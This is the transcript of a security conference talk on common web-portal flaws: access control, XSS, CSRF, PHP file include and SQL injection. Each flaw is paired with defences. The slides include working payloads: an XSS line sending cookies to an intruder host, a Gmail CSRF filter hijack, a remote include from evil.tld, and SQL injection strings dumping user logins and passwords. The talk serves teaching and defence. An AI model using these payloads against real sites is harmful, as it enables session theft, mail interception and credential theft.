• Share
  • Email
  • Embed
  • Like
  • Save
  • Private Content
Minor Mistakes In Web Portals
 

Minor Mistakes In Web Portals

on

  • 4,890 views

Michal Sobiegraj and Borys Lacki

Michal Sobiegraj and Borys Lacki

Statistics

Views

Total Views
4,890
Views on SlideShare
4,804
Embed Views
86

Actions

Likes
0
Downloads
1
Comments
1

1 Embed 86

http://sobiegraj.com 86

Accessibility

Categories

Upload Details

Uploaded via as Adobe PDF

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel

11 of 1 previous next

  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
  • good
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

    Minor Mistakes In Web Portals Minor Mistakes In Web Portals Presentation Transcript

    • Minor Mistakes in Web Portals A Real Case Study ;-) Borys Łącki Michał Sobiegraj, CISSP
    •  Why is Web important? M
    •  Web is everywhere M
    •   We spend money  We manage our finances  We earn money  We waste our time M
    •  Internecie traffic http://www.ellacoya.com/news/pdf/2007/NXTcommEllacoyaMediaAlert.pdf M
    •  2007: Web traffic has finally overtaken P2P M
    •  Web has beaten pr0n! YAY!* * not supported by any research M
    •  HTTP traffic breakdown http://www.ellacoya.com/news/pdf/2007/NXTcommEllacoyaMediaAlert.pdf M
    •  Number of Internet hosts increases Over 60 mln active hosts (netcraft) M
    •  Web security in a nutshell M
    •  Web vulnerabilities make up nearly half of all discovered vulnerabilities in 2007 (Sans) M
    •  Why?  A really popular medium ($)  Immature technology  Logical errors  Home-made solutions M
    •  Phishing victims in the US 3.6 million of people lost $3.2 billion total (Gartner, http://www.heise-online.pl/news/item/2356/) M
    •  Standard Web application architecture Internet WWW layer (I/O filters) Application layer (business logic) Database server M
    •  Wrong! Internet WWW layer (I/O filters) New functionality Application layer (business logic) Database server M
    • Application Firewall vs. Proper  architecture, coding and SDLC Internet Web Application Firewall Warstwa WWW (filtry wejścia/wyjścia) New functionality Application layer (business logic) Database server M
    •  The right approach Internet Web Application Firewall WWW layer (I/O filters) Application layer New functionality (business logic) Database server M
    •  Most popular attacks  PHP Remote File Include  SQL Injection  Cross-Site Scripting  Cross-site Request Forgery (SANS Top-20 2007 Security Risks, 2007 Annual Update) M
    •  Information disclosure B
    •  A funny story ;-) B
    •  More pics hmm… B
    •  B
    •  :-D B
    •  Downloaded… B
    •  Connecting… B
    •  PWND ;-) B
    •  Conclusion? Staying secure requires specific mindset (Paranoia? ;-) B
    •  Client side access control  It’s possible to bypass the interface  Unlike in ATMs Does not work! B
    •  Client side access control  RSS feed name based on user ID server.tld/rss/100_rss.xml server.tld/rss/101_rss.xml server.tld/rss/102_rss.xml  Reading other user’s messages server.tld/index.php?p=ok&action=msgs2&msgs_id=80 server.tld/index.php?p=ok&action=msgs2&msgs_id=81 server.tld/index.php?p=ok&action=msgs2&msgs_id=82 B
    •  Solution: Server side access control B
    •  Cross-Site Scripting (XSS) B
    •  Reflective XSS Server http://server/index.php?id=<script>…</script> GET /index.php? id=<script>…</script> HTTP/1.1 Web Intruder Application User …<script>…</script>… exec(…) Data available in the context of the User B
    •  Example XSS code document.write(‘ <img src=„ http://intruder.tld/cookiemonster.gif? ’+escape(document.cookie) +’ ”> ’); B
    •  Content alteration through an XSS attack B
    •  Rebranding through XSS http://server.tld/topics/%3Cscript%3Eeval(String.fromCharCode(100,111,99,117, 109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40, 34,108,111,103,111,34,41,46,105,110,110,101,114,72,84,77,76,61,34,60,105,10 9,103,32,115,114,99,61,39,104,116,116,112,58,47,47,119,119,119,46,101,122,1 11,116,101,114,105,107,97,46,112,108,47,105,109,97,103,101,115,47,115,109,1 05,108,101,121,46,103,105,102,39,62,34));%3C%252fscript%3E document.getElementById(quot;logoquot;).innerHTML= quot;<img src='http://www.srv.tld/images/smiley.gif'>quot; M
    •  This is how it looks in the webpage code ... <div id=quot;maincontentquot;> <h2>Results for: <span style=quot;color: #f00;quot;><script>eval(String.fromCharCode(100,111,99,117,109,101 ,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,1 00,40,34,108,111,103,111,34,41,46,105,110,110,101,114,72,84,77 ,76,61,34,60,105,109,103,32,115,114,99,61,39,104,116,116,112,5 8,47,47,119,119,119,46,101,122,111,116,101,114,105,107,97,46,1 12,108,47,105,109,97,103,101,115,47,115,109,105,108,101,121,4 6,103,105,102,39,62,34));</script></span></h2> </div> ... M
    •  The code that is to be changed <div id=quot;logoquot;> <div class=quot;logolinkquot;> <a href=quot;http://server.tld/quot;>server.tld</a> </div> ... </div> M
    •  The code in a Web browser M
    •  Final outcome M
    •  Rendered in a browser M
    •  Content change using XSS  Is not permanent  Better code  easier (sic!) An idea: A form that looks just like a legitimate one, but sends input data elsewhere  phishing B
    •  Authentication using cookies POST /login.php HTTP/1.1 login=user&password=asd12ed]r3 HTTP/1.1 OK 200 Set-cookie: user_id=734223s8uod42 Welcome user User GET /index.php HTTP/1.1 Cookie: user_id=734223s8uod42 Server Welcome user B
    •  Impersonating a legitimate user POST /login.php HTTP/1.1 login=user&password=asd12ed]r3 HTTP/1.1 OK 200 Set-cookie: user_id=734223s8uod42 Welcome user User GET /index.php HTTP/1.1 Cookie: user_id=734223s8uod42 Server Welcome user GET /index.php HTTP/1.1 Cookie: user_id=734223s8uod42 Intruder Welcome user B
    •  Session cookie hijacking http://www.server.tld/index.php?p=comm ents&comments_login=smietanka%3Cscri pt%3Edocument.write(document.cookie) %3C/script%3E PHPSESSID=gji9h519llgbgbnaqg7si0q1l0; __utma=258102041.949163972.1198624259.1198624259.1198624259.1; __utmb=258102041; __utmc=258102041; __utmz=258102041.1198624259.1.1.utmccn=(direct)|utmcsr=(direct)|utmc md=(none) M
    •  M
    •  M
    •  M
    •  How to send yourself a cookie?  XMLHttpRequest Troublesome across domains  Link img, iframe, location.href, etc. Przykład: <img src=quot;http://server.tld/cookiemonster.gif?PHPSESSID%3Dgji9h519llgbgbnaqg7 si0q1l0%3B%20__utma%3D258102041.949163972.1198624259.1198624259. 1198624259.1%3B%20__utmb%3D258102041%3B%20__utmc%3D25810204 1%3B%20__utmz%3D258102041.1198624259.1.1.utmccn%3D%28direct%29 %7Cutmcsr%3D%28direct%29%7Cutmcmd%3D%28none%29quot;> B
    •  What can we do?  Tie a session ID with an IP address  Require re-authentication  Filter or sanitise input data !!! - White-listing (ScRipT) - Consistency (IDS, Firewall, App) - In-depth (....//  ../), UTF-7 B
    •  http://server.tld/topics/<img src=http://www.serv.tld/images/smiley.gif> / M
    • http://server.tld/topics/<img  src=http:%2f%2fwww.serv.tld%2fimages%2fsmiley.gif> %2f  / M
    • http://server.tld/topics/<img  src=http:%252f%252fwww.serv.tld%252fimages%252fsmile y.gif> %252f  %2f  / M
    •  B
    •  Stored XSS Server POST /register.php HTTP/1.1 login=<script>…</script>&password=asd Web Application GET /index.php HTTP/1.1 <script>…</script> User …<script>…</script>… Intruder exec(…) Database Data available in the context of the User B
    •  Stored XSS Exploitation?  Permanent content alteration  Easy session ID hijack  CSRF  XSS Proxy  Automated worms - mySpace, Orkut, Nduja, Borys Easy ;] in web portals that allow users to publish their own content: - bidding portals, blogs, web fora, etc B
    •  Session ID hijack B
    •  XSS Worm Web Server Stores the XSS-worm code in their profile Intruder XSS … Intruder User_1 User_2 B
    •  XSS Worm Web Server Stores the XSS-worm code in their profile GET /intruder/ HTTP/1.1 User_1 Intruder XSS …<script>…</script>… … exec(…) Stores the XSS-worm code in their profile Intruder User_1 XSS User_2 B
    •  XSS Worm Web Server Zapisuje XSS w swoim profilu GET /intruder/ HTTP/1.1 User_1 Intruder XSS …<script>…</script>… User_2 … Stores the XSS-worm exec(…) code in their profile Intruder GET /user1/ HTTP/1.1 User_1 XSS …<script>…</script>… Stores the XSS-worm exec(…) User_2 XSS code in their profile B
    •  Nduja – A Cross Domain/Webmail XSS Worm Intruder E-mail E-mail E-mail E-mail Web Web Web Web Server Server Server Server WebMail WebMail WebMail WebMail Libero.it Tiscali.it Lycos.it Excite.com B
    •  What can we do?  Tie a session ID with an IP address  Require re-authentication  Filter or sanitise input data !!! - White-listing (ScRipT) - Consistency (IDS, Firewall, App) - In-depth (.. ..//  ../), UTF-7  Filter or sanitise data stored in and read from a database B
    •  Cross-Site Request Forgery (CSRF) B
    •  CSRF Server http://server.tld/delete.php?id=34 Web Application GET /delete.php?id=34 HTTP/1.1 Cookie: user_id=734223s8uod42 … id = 34; Intruder delete(id); User … Item deleted! M
    •  Useful in getting to know your users a wee bit better… <img src=”http://nasza- klasa.pl/invite/1?i=1”> (/var/log/apache/fbi_cia_what-not_access.log) B
    •  Gmail message interception (CSRF) http://www.gnucitizen.org/util/csrf?_method=POST&_enctype=multip art/form-data&_action=https%3A//mail.google.com/mail/h/ wt1jmuj4ddv/%3Fv%3Dprf&cf2_emc=true&cf2_email=evilinbox@maili nator.com&cf1_from&cf1_to&cf1_subj&cf1_has&cf1_hasnot&cf1_atta ch=true&tfi&s=z&irf=on&nvp_bu_cftb=Create%20Filter Everyone (well almost) has a Gmail account! (Domain hijack: www.davidairey.co.uk) B
    •  What can we do?  POST instead of GET  not very bullet-proof: iframe, javascript  Referrer  not very bullet-proof either: proxy, browsers, header alteration  Additional temporary ID  User ID tied to a long unpredictable key  ID-key association held on the server side  Re-authentication before sensitive operations  An vulnerability-free code!!! B
    •  PHP File Include B
    •  Local file include  Local file snoop (configs)  Arbitrary code execution (If file upload to the server is permitted)  Access to source code <?php if(file_exists(quot;includes/$page.incquot;)) { include quot;includes/$page.incquot;; } else { echo quot;In construction!<BR>quot;; } http://XXXXX.art.pl/p.php?page=../../../../../../../../../home/user1/publi c_html/.htpasswd%00 B
    •  Remote file include (Arbitrary code execution) <?php include($mosConfig_absolute_path.quot;/administrator/components /com_hashcash/config.hashcash.phpquot;); require_once ($mosConfig_absolute_path.'/components/com_hashcash/CryptoS trategy.php'); http://server.tld/components/com_hashcash/server.php?mosConfig_a bsolute_path=http://evil.tld/evil.txt? access_log:62.48.xxx.xx - - [06/Jan/2008:07:11:06 +0100] quot;GET //install/index.php?G_PATH=http://www.js2023.pl//modules/PNphpBB2/images/.bash/pr.t xt? HTTP/1.1quot; 404 1021 quot;-quot; quot;libwww-perl/5.803„ access_log:168.212.xxx.xxx - - [06/Jan/2008:22:57:53 +0100] quot;GET /files/strawberry/plugins/wacko/highlight/html.php?text=http://www.nakedarena.com/i d.txt? HTTP/1.1quot; 404 1021 quot;-quot; quot;libwww-perl/5.76quot; B
    •  What can we do?  Harden the application server (e.g. in PHP.ini) allow_url_fopen = Off allow_url_include = Off register_global = Off safe_mode = On register_globals = Off safe_mode_gid = Off display_errors = Off log_errors = On error_log = /var/log/httpd/php_error.log disable_functions = system, shell_exec, exec, passthru  Watch out for some special characters (null byte, etc)  Filter and sanitise (../, UTF, etc)  WAFs: mod_security, Suhosin PHP B
    •  SQL Injection M
    •  SQL Injection Server GET /login.php HTTP/1.1 login=admin&password=1’ or 1=‘1 Web Application Intruder select * from users where login=‘admin’ and pass=‘1’ or 1=‘1’ Welcome admin! $dane = db_exec(„select from users where Database login=‘$login’ and pass=‘$pass’”) if ($dane.count) { print („Welcome $login”) … } else { print („Bye”); exit (0); } M
    • POST http://www.server.tld/index.php?p=priv HTTP/1.1  priv_search=2e332424&cat='quot;1&w_city=quot;'asd&submit=Szukaj M
    • priv_search=&cat=1&w_city=Ca%B3a+Polska' and  1=1#&submit=Szukaj M
    •  priv_search=&cat=1&w_city=Ca%B3a+Polska' and 1=0#&submit=Szukaj M
    •  priv_search=&cat=1&w_city=Ca%B3a+Polska' union all select @@version#&submit=Szukaj The used SELECT statements have a different number of columns M
    •  priv_search=&cat=1&w_city=Ca%B3a+Polska' union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,@@version#&submi t=Szukaj M
    •  priv_search=&cat=1&w_city=Ca%B3a+Polska' union all select 1,2,3,4,5,6,7,8,9,10,@@version,12,13,14,15,16,17,18#&submi t=Szukaj M
    • priv_search=&cat=1&w_city=Ca%B3a+Polska' union all select  1,2,3,TABLE_SCHEMA,5,6,7,8,9,10,TABLE_NAME,12,COLUMN_ NAME,14,15,16,17,18 from information_schema.columns where TABLE_SCHEMA != 'mysql' and TABLE_SCHEMA != 'information_schema'#&submit=Szukaj M
    • priv_search=&cat=1&w_city=Ca%B3a+Polska' union all select  1,2,3,login,5,6,7,8,9,10,pass,12,sex,14,15,16,17,18 from users#&submit=Szukaj M
    •  Some S E C R E T S slip out ;-) 14831 users already registered (yeah, right ;-) M
    • Another discovery:  There is 1836 bots :-) M
    •  Blind SQL Injection Registration form: B ‘
    •  Blind SQL Injection (experimenting)  1' and 1='0  OK  1' or 1='1  This email is already registered. You need to pick another one  1' union all SELECT IF( user() like '%sig%', BENCHMARK(3000000,MD5( 'x' )),NULL)#  delay  user() == sig@...  1' union all SELECT IF( user() like '%asd%', BENCHMARK(3000000,MD5( 'x' )),NULL)#  no delay B
    •  Products 1-8 of 8 B
    •  Product database for selected category is empty B
    •  Blind SQL Injection • /zgoda.php?id=155765%20AND%20(select%2 0ascii(substring((select%20login%20from%20a dmini%20limit%201,1),1,1)))%3D97 • id=155765 AND (select ascii(substring((select login from admini limit LINIA,1), MIEJSCE, 1))) =ZNAK_ASCII B
    •  Results of a successful blind SQL Injection attack  Delay  Different content  Error message B
    •  What can we do?  Filter and sanitise input data - Characters white-listing - Consistency (IDS, Firewall, Application, Database)  Do not trust user-side filters (selection lists, JavaScript, etc) M
    •  Conclusion M
    •  Web application security is bad Vulnerability-causing mistakes are everywhere* *well, almost everywhere ;-) M
    •  What to do? Be sure to properly sanitise data coming from and being sent to the user  Web Application Firewall (WAF)  IDS White-listing! M
    •  Be aware of potential threats  Listenand ask  Use professional assistance  Perform a cost-benefit analysis every piece of feedback is worth listening M
    •  Use proven solutions • Traditional coding errors got answered by managed code, automatic typing, GC, etc. • Web frameworks help maintain code quality in Web Applications – Assure code quality to some degree – We are not 100% safe » Frameworks are not mature enough » Not everyone knows how to use them properly » Sometimes expanded in a dumb way » Wide exploitation due to mass usage M
    •  Hardening Proper configuration is a key! One application server configuration directive may prevent a vulnerability from being exploited PHP: http://www.sans.org/top20/#s1 M
    •  Think! No technical control will protect you from logical errors M
    • michal@sobiegraj.com b.lacki@logicaltrust.net Questions?